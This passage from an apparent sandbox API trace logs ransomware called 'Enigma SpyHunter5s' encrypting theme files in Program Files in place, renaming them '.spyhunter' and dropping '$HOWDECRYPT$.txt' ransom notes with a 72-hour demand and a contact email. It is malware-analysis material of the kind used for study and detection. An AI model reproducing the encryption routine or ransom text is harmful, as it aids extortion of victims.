lpOverlapped=0x0) returned 1 [0090.429] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.429] WriteFile (in: hFile=0xcc, lpBuffer=0x376930*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfd74, lpOverlapped=0x0 | out: lpBuffer=0x376930*, lpNumberOfBytesWritten=0x25cfd74*=0x2800, lpOverlapped=0x0) returned 1 [0090.429] GetProcessHeap () returned 0x2c0000 [0090.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x376930 | out: hHeap=0x2c0000) returned 1 [0090.429] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.429] WriteFile (in: hFile=0xcc, lpBuffer=0x25cfdb4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfd74, lpOverlapped=0x0 | out: lpBuffer=0x25cfdb4*, lpNumberOfBytesWritten=0x25cfd74*=0x4, lpOverlapped=0x0) returned 1 [0090.436] WriteFile (in: hFile=0xcc, lpBuffer=0x320308*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfd74, lpOverlapped=0x0 | out: lpBuffer=0x320308*, lpNumberOfBytesWritten=0x25cfd74*=0x30, lpOverlapped=0x0) returned 1 [0090.436] CloseHandle (hObject=0xcc) returned 1 [0090.437] GetProcessHeap () returned 0x2c0000 [0090.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c20090 [0090.437] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG.spyhunter") returned 91 [0090.438] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\thmbnail.png.spyhunter")) returned 1 [0090.487] GetProcessHeap () returned 0x2c0000 [0090.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20090 | out: hHeap=0x2c0000) returned 1 [0090.489] GetProcessHeap () returned 0x2c0000 [0090.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0090.489] GetProcessHeap () returned 0x2c0000 [0090.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x345378 | out: hHeap=0x2c0000) returned 1 [0090.489] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfdb0 | out: pbBuffer=0x25cfdb0) returned 1 [0090.489] GetProcessHeap () returned 0x2c0000 [0090.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0090.489] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfda8*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfda8*=0x30) returned 1 [0090.489] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0090.563] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 75 [0090.563] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0090.563] GetProcessHeap () returned 0x2c0000 [0090.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x347830 [0090.564] ReadFile (in: hFile=0x170, lpBuffer=0x347830, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfd6c, lpOverlapped=0x0 | out: lpBuffer=0x347830*, lpNumberOfBytesRead=0x25cfd6c*=0x9f8, lpOverlapped=0x0) returned 1 [0090.650] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffff608, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.650] WriteFile (in: hFile=0x170, lpBuffer=0x347830*, nNumberOfBytesToWrite=0x9f8, lpNumberOfBytesWritten=0x25cfd6c, lpOverlapped=0x0 | out: lpBuffer=0x347830*, lpNumberOfBytesWritten=0x25cfd6c*=0x9f8, lpOverlapped=0x0) returned 1 [0090.650] GetProcessHeap () returned 0x2c0000 [0090.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x347830 | out: hHeap=0x2c0000) returned 1 [0090.650] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.650] WriteFile (in: hFile=0x170, lpBuffer=0x25cfdac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfd6c, lpOverlapped=0x0 | out: lpBuffer=0x25cfdac*, lpNumberOfBytesWritten=0x25cfd6c*=0x4, lpOverlapped=0x0) returned 1 [0090.651] WriteFile (in: hFile=0x170, lpBuffer=0x320308*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfd6c, lpOverlapped=0x0 | out: lpBuffer=0x320308*, lpNumberOfBytesWritten=0x25cfd6c*=0x30, lpOverlapped=0x0) returned 1 [0090.651] CloseHandle (hObject=0x170) returned 1 [0090.651] GetProcessHeap () returned 0x2c0000 [0090.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3867e8 [0090.652] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF.spyhunter") returned 85 [0090.652] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\preview.gif.spyhunter")) returned 1 [0090.653] GetProcessHeap () returned 0x2c0000 [0090.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3867e8 | out: hHeap=0x2c0000) returned 1 [0090.653] GetProcessHeap () returned 0x2c0000 [0090.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0090.653] GetProcessHeap () returned 0x2c0000 [0090.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3865c0 | out: hHeap=0x2c0000) returned 1 [0090.653] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0090.654] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0090.654] WriteFile (in: hFile=0x170, lpBuffer=0x25cfce3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cfe0c, lpOverlapped=0x0 | out: lpBuffer=0x25cfce3*, lpNumberOfBytesWritten=0x25cfe0c*=0x127, lpOverlapped=0x0) returned 1 [0090.655] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0090.655] WriteFile (in: hFile=0x170, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cfe0c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cfe0c*=0x2ac, lpOverlapped=0x0) returned 1 [0090.656] CloseHandle (hObject=0x170) returned 1 [0090.656] GetProcessHeap () returned 0x2c0000 [0090.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x354ce8 | out: hHeap=0x2c0000) returned 1 [0090.656] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfda8 | out: pbBuffer=0x25cfda8) returned 1 [0090.656] GetProcessHeap () returned 0x2c0000 [0090.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0090.656] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfda0*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfda0*=0x30) returned 1 [0090.656] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0090.658] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 80 [0090.658] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0090.658] GetProcessHeap () returned 0x2c0000 [0090.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x376930 [0090.658] ReadFile (in: hFile=0x170, lpBuffer=0x376930, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfd64, lpOverlapped=0x0 | out: lpBuffer=0x376930*, lpNumberOfBytesRead=0x25cfd64*=0x2800, lpOverlapped=0x0) returned 1 [0090.727] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.727] WriteFile (in: hFile=0x170, lpBuffer=0x376930*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfd64, lpOverlapped=0x0 | out: lpBuffer=0x376930*, lpNumberOfBytesWritten=0x25cfd64*=0x2800, lpOverlapped=0x0) returned 1 [0090.727] GetProcessHeap () returned 0x2c0000 [0090.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x376930 | out: hHeap=0x2c0000) returned 1 [0090.727] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.727] WriteFile (in: hFile=0x170, lpBuffer=0x25cfda4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfd64, lpOverlapped=0x0 | out: lpBuffer=0x25cfda4*, lpNumberOfBytesWritten=0x25cfd64*=0x4, lpOverlapped=0x0) returned 1 [0090.727] WriteFile (in: hFile=0x170, lpBuffer=0x320308*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfd64, lpOverlapped=0x0 | out: lpBuffer=0x320308*, lpNumberOfBytesWritten=0x25cfd64*=0x30, lpOverlapped=0x0) returned 1 [0090.727] CloseHandle (hObject=0x170) returned 1 [0090.887] GetProcessHeap () returned 0x2c0000 [0090.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3867e8 [0090.888] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG.spyhunter") returned 90 [0090.888] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\thmbnail.png.spyhunter")) returned 1 [0090.889] GetProcessHeap () returned 0x2c0000 [0090.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3867e8 | out: hHeap=0x2c0000) returned 1 [0090.889] GetProcessHeap () returned 0x2c0000 [0090.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0090.889] GetProcessHeap () returned 0x2c0000 [0090.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3414b0 | out: hHeap=0x2c0000) returned 1 [0090.889] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0090.889] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0090.889] WriteFile (in: hFile=0x178, lpBuffer=0x25cfcdb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cfe04, lpOverlapped=0x0 | out: lpBuffer=0x25cfcdb*, lpNumberOfBytesWritten=0x25cfe04*=0x127, lpOverlapped=0x0) returned 1 [0090.890] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0090.890] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cfe04, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cfe04*=0x2ac, lpOverlapped=0x0) returned 1 [0090.891] CloseHandle (hObject=0x178) returned 1 [0090.891] GetProcessHeap () returned 0x2c0000 [0090.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3421d0 | out: hHeap=0x2c0000) returned 1 [0090.891] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfda0 | out: pbBuffer=0x25cfda0) returned 1 [0090.891] GetProcessHeap () returned 0x2c0000 [0090.891] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0090.892] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfd98*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfd98*=0x30) returned 1 [0090.892] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0090.892] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 76 [0090.892] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0090.892] GetProcessHeap () returned 0x2c0000 [0090.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c300d8 [0090.892] ReadFile (in: hFile=0x178, lpBuffer=0x2c300d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfd5c, lpOverlapped=0x0 | out: lpBuffer=0x2c300d8*, lpNumberOfBytesRead=0x25cfd5c*=0x2800, lpOverlapped=0x0) returned 1 [0090.902] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.902] WriteFile (in: hFile=0x178, lpBuffer=0x2c300d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfd5c, lpOverlapped=0x0 | out: lpBuffer=0x2c300d8*, lpNumberOfBytesWritten=0x25cfd5c*=0x2800, lpOverlapped=0x0) returned 1 [0090.902] GetProcessHeap () returned 0x2c0000 [0090.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c300d8 | out: hHeap=0x2c0000) returned 1 [0090.903] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.903] WriteFile (in: hFile=0x178, lpBuffer=0x25cfd9c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfd5c, lpOverlapped=0x0 | out: lpBuffer=0x25cfd9c*, lpNumberOfBytesWritten=0x25cfd5c*=0x4, lpOverlapped=0x0) returned 1 [0090.903] WriteFile (in: hFile=0x178, lpBuffer=0x320308*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfd5c, lpOverlapped=0x0 | out: lpBuffer=0x320308*, lpNumberOfBytesWritten=0x25cfd5c*=0x30, lpOverlapped=0x0) returned 1 [0090.903] CloseHandle (hObject=0x178) returned 1 [0090.941] GetProcessHeap () returned 0x2c0000 [0090.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3867e8 [0090.942] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG.spyhunter") returned 86 [0090.942] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\thmbnail.png.spyhunter")) returned 1 [0090.957] GetProcessHeap () returned 0x2c0000 [0090.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3867e8 | out: hHeap=0x2c0000) returned 1 [0090.957] GetProcessHeap () returned 0x2c0000 [0090.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0090.957] GetProcessHeap () returned 0x2c0000 [0090.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x376ce8 | out: hHeap=0x2c0000) returned 1 [0090.957] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfda0 | out: pbBuffer=0x25cfda0) returned 1 [0090.957] GetProcessHeap () returned 0x2c0000 [0090.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0090.957] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfd98*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfd98*=0x30) returned 1 [0090.957] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\SPRING.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\spring.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0090.958] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\SPRING.INF") returned 77 [0090.958] StrStrW (lpFirst="SPRING.INF", lpSrch=".txt") returned 0x0 [0090.958] GetProcessHeap () returned 0x2c0000 [0090.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x34c8c0 [0090.959] ReadFile (in: hFile=0x15c, lpBuffer=0x34c8c0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfd5c, lpOverlapped=0x0 | out: lpBuffer=0x34c8c0*, lpNumberOfBytesRead=0x25cfd5c*=0x1d2, lpOverlapped=0x0) returned 1 [0090.960] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffffe2e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.960] WriteFile (in: hFile=0x15c, lpBuffer=0x34c8c0*, nNumberOfBytesToWrite=0x1d2, lpNumberOfBytesWritten=0x25cfd5c, lpOverlapped=0x0 | out: lpBuffer=0x34c8c0*, lpNumberOfBytesWritten=0x25cfd5c*=0x1d2, lpOverlapped=0x0) returned 1 [0090.960] GetProcessHeap () returned 0x2c0000 [0090.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34c8c0 | out: hHeap=0x2c0000) returned 1 [0090.961] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.962] WriteFile (in: hFile=0x15c, lpBuffer=0x25cfd9c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfd5c, lpOverlapped=0x0 | out: lpBuffer=0x25cfd9c*, lpNumberOfBytesWritten=0x25cfd5c*=0x4, lpOverlapped=0x0) returned 1 [0090.962] WriteFile (in: hFile=0x15c, lpBuffer=0x320308*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfd5c, lpOverlapped=0x0 | out: lpBuffer=0x320308*, lpNumberOfBytesWritten=0x25cfd5c*=0x30, lpOverlapped=0x0) returned 1 [0090.962] CloseHandle (hObject=0x15c) returned 1 [0090.962] GetProcessHeap () returned 0x2c0000 [0090.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c20090 [0090.963] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\SPRING.INF.spyhunter") returned 87 [0090.963] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\SPRING.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\spring.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\SPRING.INF.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\spring.inf.spyhunter")) returned 1 [0090.965] GetProcessHeap () returned 0x2c0000 [0090.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20090 | out: hHeap=0x2c0000) returned 1 [0090.965] GetProcessHeap () returned 0x2c0000 [0090.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0090.965] GetProcessHeap () returned 0x2c0000 [0090.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x377340 | out: hHeap=0x2c0000) returned 1 [0090.966] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfd98 | out: pbBuffer=0x25cfd98) returned 1 [0090.966] GetProcessHeap () returned 0x2c0000 [0090.966] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0090.966] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfd90*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfd90*=0x30) returned 1 [0090.966] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\SPRING.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\spring.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0090.967] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\SPRING.ELM") returned 77 [0090.967] StrStrW (lpFirst="SPRING.ELM", lpSrch=".txt") returned 0x0 [0090.967] GetProcessHeap () returned 0x2c0000 [0090.967] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x34c8c0 [0090.967] ReadFile (in: hFile=0x15c, lpBuffer=0x34c8c0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfd54, lpOverlapped=0x0 | out: lpBuffer=0x34c8c0*, lpNumberOfBytesRead=0x25cfd54*=0x2800, lpOverlapped=0x0) returned 1 [0090.969] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.970] WriteFile (in: hFile=0x15c, lpBuffer=0x34c8c0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfd54, lpOverlapped=0x0 | out: lpBuffer=0x34c8c0*, lpNumberOfBytesWritten=0x25cfd54*=0x2800, lpOverlapped=0x0) returned 1 